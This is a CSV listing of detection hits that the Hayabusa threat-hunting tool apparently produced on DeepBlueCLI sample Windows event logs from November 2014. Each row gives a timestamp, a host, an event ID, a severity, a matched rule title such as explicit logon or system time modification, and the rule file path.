-2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 